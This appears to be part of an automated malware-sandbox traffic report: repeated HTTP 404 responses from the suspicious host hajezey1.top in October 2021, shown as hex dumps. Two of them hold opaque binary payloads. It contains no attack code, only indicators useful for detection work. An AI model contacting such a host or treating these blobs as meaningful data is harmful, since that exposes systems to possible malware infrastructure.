              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b f7 79 8d fb c4 4d c2 ec 5d 4f 5f 5b ff 33 90 5f 84 e2 eb 0b 4a 05 8e 8b a4 d4 ac e4 80 54 fd 17 d2 ea 4f e8 a1 1e c7 1f ab 29 29 8c 97 ad 67 c0 78 b7 bc 72 3f 1a 7c 03 84 5e 85 63 91 5b 07 e9 1f 9d 15 46 a6 b3 58 f1 06 ee 0c 42 de 8b f4 24 eb a8 e1 48 29 e8 74 cc 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f 61 79 b7 9e 96 98 8b 36 19 19 cb 8a f3 d8 04 0f 4e 86 19 7d 6f 37 e3 04 89 3d a4 55 80 90 70 89 9c 2c 4b 6b b6 e2 a2 22 48 d2 d1 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 eb 5f c8 c3 e7 b2 ec 24 1a 0a 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 54 8c f5 0a ef 8b 71 91 e0 35 a3 64 49 e0 76 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa cb f9 b0 72 50 6d ec f0 52 a4 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 d2 ab 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 60 9c 82 4b d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 e3 40 3d 9d 43 cd 17 fe 2f 89 9d f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 7e af da 11 4b 95 36 2a 21 3f 65 74 b0 bb 87 f6 aa 81 de bb a0 69 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 9f 3a 48 93 9f 4e bd 44 ef 5a 89 4f dc ea c0 4a 00 97 af a4 57 25 11 bb d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 11 e6 cc 64 3d da 9a 56 3a 22 7d e6 d2 1b 62 b9 50 31 eb cd 14 26 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 12 c3 b2 a5 83 41 ab 13 af b8 e8 81 63 a2 57 4a 60 87 bd 5f 6e 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 dc 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:30:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 